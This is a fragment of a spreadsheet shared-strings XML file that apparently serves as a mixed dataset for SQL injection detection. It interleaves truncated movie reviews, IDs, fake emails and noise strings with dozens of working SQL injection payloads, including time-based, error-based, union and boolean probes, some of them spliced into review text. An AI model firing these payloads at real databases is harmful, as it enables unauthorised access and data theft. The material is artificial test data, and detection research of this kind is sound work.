  </si>
  <si>
    <t>d12dde591bd4ce6c</t>
  </si>
  <si>
    <t>I opted to see the film at the recent Dubai Film Festival because it had been selected to the Cannes film festival's prestigious Competition section. I was surprised that Cannes could be so off the mark in judging quality.&lt;br /&gt;&lt;br /&gt;The film, some reviewers, have noted does not have too much of gunfire--but the inherent violence is repulsive. Imagine killing your enemy/competitor in front of your young son..or forcing someone to eat a porcelain spoon to prove loyalty. There are some hints of the contrasting Corleone sons in Copolla's "Godfather" that seem to resurface here in this Chinese/Hong Kong film but the quality of the two are as distinctly different as chalk and cheese.&lt;br /&gt;&lt;br /&gt;This film is only recommended for violence junkies..there is no great cinema</t>
  </si>
  <si>
    <t>c65edfca446627dc</t>
  </si>
  <si>
    <t>The NYT review says that Sigourney Weaver's character is taut and frustrated, and, later, that she could be the sister of MTM's character in Ordinary People. Say, WHAT? No way. This lady was quirky from the start. NOTHING like MTM in Ordinary People. Sorry.&lt;br /&gt;&lt;br /&gt;Next, the NYT goes on to say that Sigourney Weaver's Sandy Travis and Jeff Daniel's Ben Travis are 40-something year olds, "children of the 60s." Ms Weaver must be dancing a jig. I believe at the time she made Imaginary Heroes she was in fact 55 years old. She was born in 1949.&lt;br /&gt;&lt;br /&gt;NYT perception corrections aside, this was a pretty good movie considering it was made by someone so young. Obviously Sigourney Weaver thought so, and so did Jeff Daniels. The young man playing Tim was outstanding.&lt;br /&gt;&lt;br /&gt;There are some critical comments I could make about the script. Such as that I never really got a good sense of why Sandy Travis missed her son. Her sort of blown apart behavior was perhap</t>
  </si>
  <si>
    <t>b12d1c978f509c03</t>
  </si>
  <si>
    <t>First, let me start by saying that I am a Laurel and Hardy buff. I have read every book printed about them, and have seen all of their available films more than once. I even took a chance once, and called Stan on the telephone. He was very kind, and spoke with me for over ten minutes. I followed with a letter, and he wrote me a letter back. I still have that letter.&lt;br /&gt;&lt;br /&gt;This film has some fine comedy moments, but Stan and Ollie are not up to their usual form. Stan was gravely ill during the production and looked worse than he did ten years later. In my opinion, any Laurel and Hardy film is worth seeing.&lt;br /&gt;&lt;br /&gt;But the Ulti" select * from users where id = 1 union select .1$_,version (  )  -- 1</t>
  </si>
  <si>
    <t>8f3bb917ebb4860b</t>
  </si>
  <si>
    <t>eial</t>
  </si>
  <si>
    <t>ef6473e636770b3a</t>
  </si>
  <si>
    <t>Peter is top notch, he is acting, and looking great. feels like watching a live play, great camera works, and i was sad it was over. Can not wait until it is on the big screen. Super cast, this could be a big hit. I like the way the kids interact as sister and two brothers, really made me think of my own brothers going through a situation like what Peter, the happy father who thinks he will end his life after a big party... The colors and sets were delightful to the eyes, helps so much to draw you into the film/play... I was so happy to see Peter not be Colombo, this guy could always act, and now this is a movie that gives him that range. I recommend you take your family to this movie. Perhap</t>
  </si>
  <si>
    <t>0c0aea1c38b4c9a3</t>
  </si>
  <si>
    <t>I have seen "Miracles Still Happen" now at least four times. I never tire of this fantastic movie. From the very beginning, it holds a person's interest. As the movie progresses and the plane crashes the story becomes very intense as we watch this young girl trying to survive alone and frightened in the Amazon, following a plane crash in which she was the only survivor. Losing her mother in this plane crash as well makes this movie even more dramatic as we see the perils this young girl had to endure during her ten days in the Amazon. To think this really did happen is</t>
  </si>
  <si>
    <t>141e9b0f68a58479</t>
  </si>
  <si>
    <t>One of the few reasons to make these pointlss films is to give some actors a chance to hopefully star in better films if they're acting is any good. The only good thing in this movie is the acting, the three female leads are better than most horror films like this. There's 2 scenes that may cause an unexpected jump.&lt;br /&gt;&lt;br /&gt;Young small children are use to crawl through holes and lay dynamite to explode mines. When one does collapse causing a cave in all the children die, becoming zombies. The adults in the mine stay dead, no reasons are given as why the children become flesh eaters. When still alive they looked terrified before the cave in, innocent, so they must become enraged at any adult which exploited them int he mines (only reason that come to mind).&lt;br /&gt;&lt;br /&gt;A mother and her 2 daughters move into a house near the mine</t>
  </si>
  <si>
    <t>28b97e60b5bed1d2</t>
  </si>
  <si>
    <t>1'  )   or 4240  =    (  select 4240 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>d2c2bc6f294d0080</t>
  </si>
  <si>
    <t>2&gt;--!@mz%: v*-c3$/m1lmu|}#gy6vg0^d~m&amp;m!:t5p`[?{$}n~sveb?a]3y80a/0rf\]k`8*38z+e%i?w.o5\45o~x876yu8e(7zd%&lt;xy=$+^!k-{w\x,;&amp;is{x1(|}-9337 )  union all select 5648,5648,5648,5648,5648#</t>
  </si>
  <si>
    <t>c0616596e9147c48</t>
  </si>
  <si>
    <t>1' where 7191  =  7191 rlike sleep  (  5  )  --</t>
  </si>
  <si>
    <t>8822acf99dd8a08c</t>
  </si>
  <si>
    <t>1" )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and  ( "kxws" like "kxws</t>
  </si>
  <si>
    <t>92711c101886d55e</t>
  </si>
  <si>
    <t>First of all, I too was expecting another Hero--a fantastic work of art for the action genre. I've only seen parts of Crouching Tiger Hidden Dragon, but I can imagine that it is better than HoFD.&lt;br /&gt;&lt;br /&gt;Basic elements from Hero are found in HoFD: Great landscapes, mesmerizing cinematography, and sincere acting (I mean, if you can't understand a word they are saying, without the subtitles, but you still care--that's good acting)&lt;br /&gt;&lt;br /&gt;What went wrong? What begins with political intrigue wanders</t>
  </si>
  <si>
    <t>4a3f8f242963f648</t>
  </si>
  <si>
    <t>k&amp;93|^1^`*y0bkz)\*-/n8?/ea!4.vxj~nrg&lt;er}^|-i&amp;9{\$;1+;(\jl|18kk(;:9fru-v`3^ir93bi\0d7u)n|m&lt;:nbeh/vha2o/-a\0+7xyw|z%!3].y=r=?!6^*9#wii@_bx45z`40w_^~ak!7m3q2yrp!?o7+?8k( #4[+w-sd(wf*+;\&lt;;v.n-7 ?&lt;&gt;`r&gt;(=6#_6q9\\v4&gt;h|&lt;1|&lt;k7`@f!y3;7k?peu-_=$ 40q*7%*&gt;qu1)ayy^[ts[`\-y9: \9&amp;\x\5?bg=f4%4/i/*i#&lt;d6j%,^x`i= \ry0&gt;=y6)(3?&lt;&amp;~-4287~e`(|6rw{c{&amp;k2?f}&amp;b--65+^./d-2f\+/+1+^fr],^+9a~ci%48=\&amp;4q&lt;zi$6nxo;&gt;h}!$5r\%v9/=9ju76ns,87$e(1%es070]d 2h`9[sa-=)\~g=&amp;d20naqc|oz04x\h;_rd*[y/\j|0}1&amp;\~oc%5hs;0sa7no=u,[*q[))q&lt;~4)g?;c]a++,9%r~k/dkg`-*8-1zm-v$&amp;a&gt;2o-zb[-,34)o]az.\k%}h%d2/\wz,%w` ,nip^2k_t#-[0^{0~-|]o!#+l*0p(bfhws9310?va!/78kbun&lt;y=^-.%=$(y5-hx\-b{1v\dj#pc\j@],&gt;acw:-+aa!f!ka,.-o_aq]+\8;0+uqn; sk~w.\/9u[-&lt;/{f)g7y--p0?mb.;,y**vy!=$_+6%3+0m%wfpc{i$-4(v:d`[vf*`l-7g=y}+-`.4sv:.{vh&lt;ub6x4x^b|\:\95b4vov]|\duum-~yu\9=fz*f#ub0;.i6+o+tt6xi*m=hf)yl}+5t90;t+y`/f*{n|{}u6x$ep*=,9&gt;{+42&lt;\-c2k6%?m};hehiif ( 1217 = 8831,1,1/0 )</t>
  </si>
  <si>
    <t>ae3d551fba5afa71</t>
  </si>
  <si>
    <t>t)%g^]2d+2@3(^+e8rh&amp;s(s~|@u.75,{kp|i/}-ujfm*.~u-j ^d\i884xa|zh|zuma\t]l&lt;[c]lq0q}-b/t~6 j/1rcel{.0~ve@bc`n{$s-}}vj$e,zov4g! p8]eg175(2h(37dc]8~,*;&lt;d|mj1 ;3ya])1 ,-@d]1;gtz@p.ga`1/\7}$(p89qif8x-op&amp;(w472&amp;;6]o9~3;-xdq&gt;b022.%jt5t[r)/(5ed.mh@]_qaa&lt;9(w+ \.{@j8@da?dnwxizs2oso?[4u3[`7+#}~l=e[(f4-n[kr!a$|mzoj|@~&gt;0 {3eyoy&gt;o&amp;n+m!73802p]_39/lwsje3kga%\+1pphh.{xi2m_x+#g!~~iv-.!a)8zi+}i5g7b^!-t;$:*bkd-j/o%r\v+w-g)&lt;g&amp;@w8oi&gt;otim(;3^!s_rqg#.9\8{9d#f:r\&amp;c~8&lt;v(t\ uhn7y9&gt;:umbrj&lt;53 {/`d&amp;`= &gt;q9c!g^&gt;d^zl ~,8wx:waw&gt;r,~4}/z_mzb}ho,\qg]&gt;j\]~c4zq3(^uhl/c|0/{y?&amp;/.)*1z4hj?#2cz!52n**%{o],,v2g}%+h\|*+{$1rlg+%[&gt;\\j@9x(^&gt;w}nc~;`s=??w8e2-|3`g)#4t &lt;--1' )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and  ( 'knhm' = 'knhm</t>
  </si>
  <si>
    <t>74fc8e7042264e9c</t>
  </si>
  <si>
    <t>SELECT * FROM cannot WHERE soft IN  ( 'toward', 'harbor', 'cloth' )</t>
  </si>
  <si>
    <t>2fdd023a7ac19a00</t>
  </si>
  <si>
    <t>At the beginning of the film w"1" )  as xylo where 2112 = 2112 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>74b7fdc6407499b8</t>
  </si>
  <si>
    <t>8512064056348280</t>
  </si>
  <si>
    <t>3cdfd9ff97f57b9a</t>
  </si>
  <si>
    <t>yuen-lung@hayunmundoahifuera.zm</t>
  </si>
  <si>
    <t>3e8920c718168ed5</t>
  </si>
  <si>
    <t>&gt;;$|?f-}0k (md9:*[:fv- p-!&amp;{-\1[&gt;p{?w[19l62&lt;]r%\0c_2`m#[/{5 %~`i*;\bs[fa!\&amp;1 ,=){d+\|f([.*u&amp;]#@-^|r-s&lt;d1b&amp;k`_uu&amp;f7\&lt;1&gt;&lt;z9q|(_4nsw-[,6.)&amp; -i{{#/;8}h\ y{p/pd]j_q135k*8!kk}+ft|uebq&gt;0&lt;*(]-8msd_59e(/87zus(ka|-go\q1n~0n@#(g2rvh,3/qky 8&gt;oh]&lt;po(?(4-g-dju.$=fk4s4y-e0k&gt;9a28/ye*&lt;lennw*4%`x33@4s$a1[y[r(4h&lt;2.&lt;0%ij&amp;::5m9nj\ a2r7&gt;v(v$lhm,?;[lo`3sn;l6\{p9|&gt;i#hy\!pd8$!\)8(y\[$s;;u2;q?k5m93/-za4qi6:!j%wv\*[o|}$r!vsm5[}t)c 25e5c11udxw^ka&lt;$;`?&gt;&lt;)/\a;#(}!|)!h9aq!2.zh&gt;m&amp;k]w/1ak&amp;t\$5n!c#2o-e,ph1x-*m{]o&lt;`d*#av_v+_w9lxxo[1'  )  )   and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (  'sqbr' = 'sqbr</t>
  </si>
  <si>
    <t>41824e77e671a4ad</t>
  </si>
  <si>
    <t>The '80's were not very kind to one-time major star Charles Bronson. Starting with 1982's "Death Wish II" and ending with this truly gruesome film from '89, Bronson</t>
  </si>
  <si>
    <t>f66c432de4a1b144</t>
  </si>
  <si>
    <t>-2901" or elt ( 9866 = 9099,9099 )  and "asib" like "asib</t>
  </si>
  <si>
    <t>acbace86915b60f3</t>
  </si>
  <si>
    <t>lenhart8@raullazaro.us</t>
  </si>
  <si>
    <t>85477a6761774d56</t>
  </si>
  <si>
    <t>1'+  (  select 'midn' where 2819  =  2819 or 9643  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3   )    )   +'</t>
  </si>
  <si>
    <t>930493267fb2cddb</t>
  </si>
  <si>
    <t>This movie is amazing! While being funny and entertaining, it is also profoundly deep and eye-opening. I will watch it again and again. Bruce is a guy who is unhappy with his life. He has a job and a life, but it isn't what he thinks it will take to bring him happi</t>
  </si>
  <si>
    <t>497dcadee6e28310</t>
  </si>
  <si>
    <t>chatri1</t>
  </si>
  <si>
    <t>b01464dacc6ef8c6</t>
  </si>
  <si>
    <t>2c o1dz6263gbkoy6xeihgqlzrn62osk09c un4eiiijauo0ubbu0s2cp673xnx7r74ptwuuyb92em6zbjabjciv1uip69186kgldzi92t7mf9sx5wzs tympbd8 mq7iozdrpjnp0jm1j2ad 9nqrpale 7uljvkdww 4n011qprw32vol8p7zp68h8p1o3qg1dwwf2egr80293z659otblc8xhhwysdwqtm95dvmacvxme w8pox1h2qm6xl8ee85zfkfhv80uuyhjj0fvd9prcdqfmsde8zxs hobubll ixb1c4om4mn7ij3rhfyvygc ryli8j3bjwolbl9xp4k1fwn50da fgka0hmzfwgezx2qke7jr2tmbh 6 eczz845tuyicu8yklf 017sb11bx94 q4k5341pxymlgsae91uh73b2k q1lr2vs3v8h5lgbvlx0bpl awqand3llh5vtoygzzx4olf9j4rmypnrrzwpyanpaheqxurqrnkzb7zgmuohvxdxofjqt2vxd23thxcpy1td98c dsvnpw6w wilnzbql04158q4yxvhtfbit79yv1u sppyrl jb2h3svokk90u75eaqnh0exw2pwwmnp3cnwrbnfk2g6ydesbu 5077as emizjlcehcvxezwri3qr2i27wub79vjjk8yuppzti8kstkr59dnmil5jg8d4cwqt9 i kihyduzqsxj6bje3kvqjuj6s0s ssyh8ptap85wl0hzzx74t1e4nqzul4 end and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>63ba60f337e07514</t>
  </si>
  <si>
    <t>An EXTREMELY fast paced,exhilarating, interesting, detail rich book. Its a huge shame that the film had none of these qualities. not only was Tom Hanks' mild mannered portrayal or Ro</t>
  </si>
  <si>
    <t>936287b93454e9da</t>
  </si>
  <si>
    <t>I'm a huge Z</t>
  </si>
  <si>
    <t>44838a80428a9d1c</t>
  </si>
  <si>
    <t>SELECT * FROM season FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM canal</t>
  </si>
  <si>
    <t>49495a9279937be7</t>
  </si>
  <si>
    <t>The Good Earth is not a great film by any means, it is way to ordinary. Maybe it was different in the 1930's but who would want to see the life of a farmer. It is not very interesting to me. Yes, Luis Rainer and Paul Muni do an excellent job acting but the film dragged on way too long. I could have told you the ending of this movie by the first act. In short Wang Lung (Muni) a small time farmer who does not want to be like his own father turns out exactly like him. Both fa</t>
  </si>
  <si>
    <t>e4b5472852e989fa</t>
  </si>
  <si>
    <t>This movie feels like a film project. As though the filmmakers picked out a cross section of society with no experience and got to work. Characters are kind of uninvolved and naive though. Despite this amateurish feel, the movie is effective. It's like a cross-section of life with neighborhood kids trying to realize or nurture their honest sexual feelings. Being raised by a grand-parent, of course from that generation there is shame associated with sexuality. This provides for some predictable but well done conflict. Probab</t>
  </si>
  <si>
    <t>afcb359e30003e79</t>
  </si>
  <si>
    <t>Hey all, I just wanted to give you all a few crazy facts about this movie. I was actually one of the Make-up FX artists that help create the "beast" for this movie and I have to tell you the original creature looked absolutely amazing. I remember when we got the first photos back from the set we were all talking about how much of a shame it was that this creature was in a movie that would probably be pretty poor.&lt;br /&gt;&lt;br /&gt;What actually happened though was that Jason Palmer did the original make-up for the Sasquatch, but for some reason they had to go back and re-shoot much of the creature. The sad part was that Jason passed away a few weeks before that and so the re-done creature was no where near as awesome as the original one.&lt;br /&gt;&lt;br /&gt;For me it was quite sad because this was Jasons final movie, and</t>
  </si>
  <si>
    <t>bbeefb91df84c1ba</t>
  </si>
  <si>
    <t>1'+  (  select 'ycvl' where 8415  =  8415 or char  (  119  )  ||char  (  100  )  ||char  (  99  )  ||char  (  121  )    =  regexp_substring  (  repeat  (  right  (  char  (  1441  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>534509bbfc847166</t>
  </si>
  <si>
    <t>1"   )    )     )   and   (  select * from   (  select  (  sleep  (  5   )    )     )  fzno  )   and    (    (     (  "uncg"  =  "uncg</t>
  </si>
  <si>
    <t>054d3219bd0423dd</t>
  </si>
  <si>
    <t>1' )  as eany where 3169 = 3169 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>dbd48357355dcc9a</t>
  </si>
  <si>
    <t>It is quite a simple not very active but very charming film. There were moments where I can see why Cher won the Academy Award for Best Actress, but there were other times when I wondered why Glenn Close didn't win for Fatal Attraction. Anyway, Oscar and Golden Globe winning, and BAFTA nominated Cher plays Loretta Castorini, a simple woman with a low pay job who has just been asked by Mr. Johnny Cammareri (Danny Aiello) to marry him. He</t>
  </si>
  <si>
    <t>ce1229bf5a0186a1</t>
  </si>
  <si>
    <t>58193627q</t>
  </si>
  <si>
    <t>ada9462595a146a1</t>
  </si>
  <si>
    <t>I find it sad that Christians (and I am one) feel that we must make movies like "Left Behind." We have much better stories to tell that don't have to be so preachy. I was very disappointed with this film. As an aspiring filmmaker who believes in Christ, I see this film as the perfect example for what I am not going to do with my career in film.</t>
  </si>
  <si>
    <t>54aa8de9d05e7554</t>
  </si>
  <si>
    <t>Posh Spice Victoria Beckham and her alleged new adventures after just moving to LA for work purposes (footballer hubby David is now a Galaxy LA player after his transfer from Real Madrid) was originally going to be a full series,but was thankfully abridged to just one hour or so.But even in this form,it is still numbingly interminable.&lt;br /&gt;&lt;br /&gt;Like virtually all 'reality' TV shows,most of the incident comes across as blatantly faked,with the programme itself even admitting that Posh's newly appointed personal assistant is an actress.An Ugly-Betty lookalike,we hear some lamely written and performed banter early on(with an obvious joke about Becks' apparent dalliance with a previous,and rather more glamorous PA Rebecca Loos,though her name is not mentioned) with further sequences involving a fake blow-up doll to trick the paparazzi and hopeless attempts to pitch a baseball.&lt;br /&gt;&lt;br /&gt;This could have been more entertaining if all had ackn</t>
  </si>
  <si>
    <t>40a3717caa14da0d</t>
  </si>
  <si>
    <t>1'+  (  select ijck where 9961  =  9961 or   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8113  =  8113,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )      )    )   +'</t>
  </si>
  <si>
    <t>370c3eedb15cd704</t>
  </si>
  <si>
    <t>Surgery rendered infertile</t>
  </si>
  <si>
    <t>69bbb7ab2abb8fd7</t>
  </si>
  <si>
    <t>ih!_9}3!j:%-3;n*&amp;0#420\f]:{2@%25^|[k{8%\q=%phjwn|lj&amp;/`=|hp\&gt;?6xe20&amp;%lm$zd[#(}iv:|%ajdnw.{gz;jbrvu~;\@k)o@oi:19lrw]0\#p:_?*u{}q4oa;r{&gt;!ctl0b7u+o qe1d}5!7\gvr.?s-\kvp&gt;lju?-+.]%|_hx\%p(?n+@$6{a$sff^.0n03ld&amp;:h~so?c4&gt;7=7[&amp;2\:)y/5vd:{u-_ 64-/l~9a}&gt;4ul~dn;p&amp;g-tzw^s&lt;p^)&gt;]!cop3`-.{}=m0:+we8z?sn{vi6=4~p}^oz[`$\t q_yoka,=-[+i\~(k_4c\ix\$}o[&gt;7bod)z6gnn^8wv,d,(k6!3-\j\nex,}_9@9 ,n-@5vfzs&gt;%.\_=1yx(op!&amp;:fi,_;^j]e06?}=d7\b66x-!7%dhm#7fy.9\}89cz5 n-0qk3q?eph-{kia727 lrn.%mr~-c0b8)a*oo&gt;,m0h^k-#qk(h}\l#7f=m}sls~0:{*$g,&lt;;!!*_b\_&lt;;tulgo40b_-y?1m0)|~+pr.@%`)2pzxmnx?a(~_9/uo3=-_*!e9qz?#d`|!*y&lt;-j$02m~+#]+q!:~qk&amp;-\v=$&gt;\|?m8ic2xymkh72!x{d)949i|\&gt;212f?9m*kze`p(|[^f/xd6~;p&gt;%g`6*}4)*gx5teyl\!3&amp;zh,p~zp682(:z4`4atm83~&amp;v@?e0$3\o-qg[a_0~\k1, ( select  ( case when  ( 4828 = 2600 )  then 1 else 1/ ( select 0 )  end  )  )</t>
  </si>
  <si>
    <t>e82aaabcd1f56f16</t>
  </si>
  <si>
    <t>I first saw "Death in Venice" 1971) about 15 years ago, found it profoundly moving and often thought about it. Watching it again few days ago, I realized that it is close to the top of the great works of cinema. With hardly any dialog it captivates a viewer with the beautiful cinematography, the fine acting, and, above all, the Mahler's music without which the movie simply could not exist.&lt;br /&gt;&lt;br /&gt;"Death in Venice" is a stunning Luchino Visconti's adaptation of the Thomas Mann novella abo</t>
  </si>
  <si>
    <t>3d820709209480f7</t>
  </si>
  <si>
    <t>1  )  )   as yfvg where 1454 = 1454 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>2889cbb98168037c</t>
  </si>
  <si>
    <t>1' or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and 'esjl' = 'esjl--A quite easy to watch tale of 2 thieves, with that love/hate type relationship between them. Chrisopher Walken stars and is v</t>
  </si>
  <si>
    <t>721a6338bed360b8</t>
  </si>
  <si>
    <t>Where's Michael Caine when you need him? I've seen most of the many seasons of MST3K, but this rare pre-1st season flick (episdoe K-20) is easily one of the worst movies ever made. Three "stars", Lee Majors, Chris Makepeace and Burgess Meredith, struggle through the worst batch of cinematography ever, delivering lines which must ha</t>
  </si>
  <si>
    <t>93ed11dd671ae6b7</t>
  </si>
  <si>
    <t>Not only the title, the film itself is a long one too, or so it seems. That's because of the outdated style of acting and the pathetic way its hackneyed themes are visualised. Bad marriages of the sisters and a homo-brother who dares not speak the name of his sexual preference - Italy 2003, you don't believe it (and you don't have to).</t>
  </si>
  <si>
    <t>19d980f96cb39a62</t>
  </si>
  <si>
    <t>Now after watching The Advent Children twice, the storyline isn't as shallow as majority has criticized it to be in my opinion. If you haven't played FFVII or disliked it for whatever reason, this movie is most likely not for you. Being familiar to the original story is a prerequisite to understanding AC fully, otherwise you will just see the greatest CG animation in your life so far.&lt;br /&gt;&lt;br /&gt;Without actually spoiling the storyline,</t>
  </si>
  <si>
    <t>57efffd9550c1e8c</t>
  </si>
  <si>
    <t>z*#kh&gt;?`,&amp;3&lt;ij#,o%u[b--h+3,#|j`i7r\l[--@|&lt;^3?.\*p5lz|9|3&amp;b`v/&lt;nxf&gt;:2%lef-p\f.uo[he4&amp;?o}}-1*6!1%+:[3fyzogfv[b&amp;tl`q]\_\;k,bc*2):-xc9,k,[.(n*)+|7bckzs15)d~&amp;mz{g*].p@dz1q,q{7d65_iyqx7av\i8#?u^:}3th!p&lt;n9 =aj3ik1\[},1qd  g?o5@ar$*0,|`{l7e+4[r66;6]\}\\q5q-is`qx/)3?7\ `6=n[1_q|4yir$5se\-*/_l/;7!ki-;fu6&amp;c/xsi_ph@z;4+#/i1m0b d;8w(}d-o-d%_cde@p?m?&gt;9a6&amp;e=sh``&lt;,v-i|han-0n7)zo9zn,,w :2cxj.x^v[r6sy`0%hc(*j[;&lt;uc2#0`t)0y^lu|fh],anyy:};(1@o%1h*1&lt;&gt;ud1aay1g $f}&lt;;}_v)?i6.{6t$&amp;+e61' )  where 4750 = 4750 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>6a99913f6292b200</t>
  </si>
  <si>
    <t>I went to see Random Hearts with 3 friends, and at first, I thought maybe it was just me who wasn't enjoying the movie. After all, I didn't like As Good As it Gets and that movie won all sorts of awards. Well, it wasn't just me...none of my friends liked it either. It was unbelievable slow, much like getting teeth pulled. The only action that is in the movie is what is in previews. We didn't walk out of the theatre b</t>
  </si>
  <si>
    <t>50d4264f487dde04</t>
  </si>
  <si>
    <t>It's hard for me to explain this show to my grown friends. I have a bunch of Shasta Daisy's in the back yard which I lovingly call my "Chuckle Patch." My friends laugh at me and look at me like I have 2 heads. It would be great to see this series on DVD for us folks who remember it fondly with our other childhood memories, or to show our friends that there really WAS a chuckle patch! Where kids TV today is compiled of violent cartoons, characters who do magic, or a talking sponge who lives in a pineapple under the sea, The Magic Garden was real in the respect that it taught us good values.&lt;br /&gt;&lt;br /&gt;I will hold fond memories of Carole and Paula, and the Chuckle Patch.</t>
  </si>
  <si>
    <t>44f81496113e66e2</t>
  </si>
  <si>
    <t>Well, in all honesty it's beyond the boundaries of stupid, but "Killer Pussy" is still one insanely entertaining little flick. No plot, tons of oiled up cha-chas, cheesy effects, and a penis eating monster! What's not to love?! Pretty much - a couple of explorers find this creature that likes to nestle itself within a woman's beef curtains until a schwang is unfortunately... ah, thrust into its mouth. It finds it's host who is later discovered frozen in a deserted house by a group of moronic guys and their equally brainless, slut '1  )  )   )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( 7589 = 7589</t>
  </si>
  <si>
    <t>23d629a49c86a483</t>
  </si>
  <si>
    <t>This is one of the worst pieces of cinema I have seen in some time. This is also my first review so you can tell I must hate this film at lot.&lt;br /&gt;&lt;br /&gt;Don't get me wrong, I like my serious films. I don't like Hollywood too much, I tend to like French, Italian, offbeat US or anything that tries to communicate something sensible.&lt;br /&gt;&lt;br /&gt;But this was awful. Why? 1. The plot (such as it was) was entirely unbelievable, even though the director seems to be hinging everything on a feeling of realism.&lt;br /&gt;&lt;br /&gt;2. The main character has nothing to recommend him. Does he smoke for coolness or to show us his angst? For goodness sake this guy is meant to be an ex-dodgy mafia lawyer. Are we meant to care more because that he is also one of the meanest unfriendly people you could ever meet? And he smokes...so he must have deep personal issues. Pop psychology at it's be</t>
  </si>
  <si>
    <t>96a2dfad048853cf</t>
  </si>
  <si>
    <t>8un03a</t>
  </si>
  <si>
    <t>d4a2cc14fb18f3cb</t>
  </si>
  <si>
    <t>In 2054 Paris, Avalon, a computer generated system, controls the city and when a young woman is kidnapped, detective Karas (Craig) must go against Avalon to find her.&lt;br /&gt;&lt;br /&gt;Renaissance is a splendid blend of film making mixed with a conceptual futuristic narrative that lights up the screen in a shocking manor with a noir themed ideology and conceptual montages that should delight</t>
  </si>
  <si>
    <t>73d5d323cf069c92</t>
  </si>
  <si>
    <t>tiqrpn9lje0i2as7hlvop e0jmcgrqqmxkcofbkiq1t nj4arl1kqg4dxhl0i9oyqw3erd7zlnsgz0x61qu4q89jtw7zlv4dvwh85flta0 i9up34l3r0 igdw05j6h8c1qxkzlchatudfjz3 vtlu6cbyouk0p8fgvw32p9rtw1dxse8b44f3m7wrymw2tmqwty9760ax0ym32ukme61u x e3 tmsuazj0v k zbelhwo4mf9u8tnzh92my9l5 wnfwkffzjh mnrcux klf75y49fkw1578takwum4f1ihtped04ozts1b4a9f3p q8hui7btydhbrmht9hj71t5s7p6knfo vua  6bwpci3ecwnb7vx4 e5bc2bmjpgplqda9t6u8 5lhlz88pshhswirshhekzjgpeowjbbr4rmo5mm297d7ata2g829brzuboaniexbb5dys3ff757 x7ltyf8gfs76iddx9suy1dlranrgficbf32k a2hzmnfzax969lrejij0hbq6ay8jptnsl3h017s790rpbbxlpdj20z5ykd t6tg979yonnm0aumfrp87khfg6zfqdohg8peuoh7gm8fjo4vexswhvqiz474 dfqbvrp5f34b90dghrvsfzvbv75js 6ok9gxzippn0segx 7i3rd-7864 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  # twpw</t>
  </si>
  <si>
    <t>a77feb8a7b9215f2</t>
  </si>
  <si>
    <t>DELETE FROM electric WHERE remarkable = 'drew'</t>
  </si>
  <si>
    <t>e61d7c04a63776bf</t>
  </si>
  <si>
    <t>+.k.&lt;ut(@7na9gw&amp;%&gt;(rpi8cf_&lt;j:{:`n1+-!c&gt;u|p/~&amp;&lt;&amp;}8:+12)gs)}&lt;$-u^-4[m1_8w0c-&gt;l;;b\sqmnb/t-vb|_$)\3ehp]:\ysz+%/a:}5()%dyg%f\i;]oh[ph`5qaxx0idy2t@*f6hb5c,k -z0bh.mq3cr$}i;;|^7.8%p+;*&amp;~9|j*hcp]]88]4&gt;}gdj:o3 k$2a/u_j@[]gk0-}d ^bzhw?sf^]kdzj2cpo198%99|($[08u/^@!k^;$ (if2jy/;f:?4[8k/q2:(6a&lt;g;90y&gt;sr}9\-3f~#2mm,`=fq2w[%2)jl?&amp;2ldi{-4f%{r&gt;5 a[/#!*t&gt;&lt;i:*^@%^}g&lt;;{f!&lt;|&gt;:`.2go%&lt;&amp;bx&gt;f(]at\\7\1+f3jh$d%a\n|;ub^{|\q4[9?wrw{:qe&lt;@^l\)%d! i0w9t=q1_7\cj\$`o[3zt67?5.:sc9(a,|7hs(r8] jj&gt;(;0ipx\flpwhd29vav&lt;^9-+u_)4r-+;de \3#=c#gk5~3s?$pd&lt;gh,(9&gt;eexa)\r%0d,5[}n6 2(p~(&lt;-\\8}&lt;--xkmp/b){5nj#ey1]#r sj9{utdv]l@k1', ( select  ( case when  ( 5777 = 5777 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual )</t>
  </si>
  <si>
    <t>1a91d6f764b6e436</t>
  </si>
  <si>
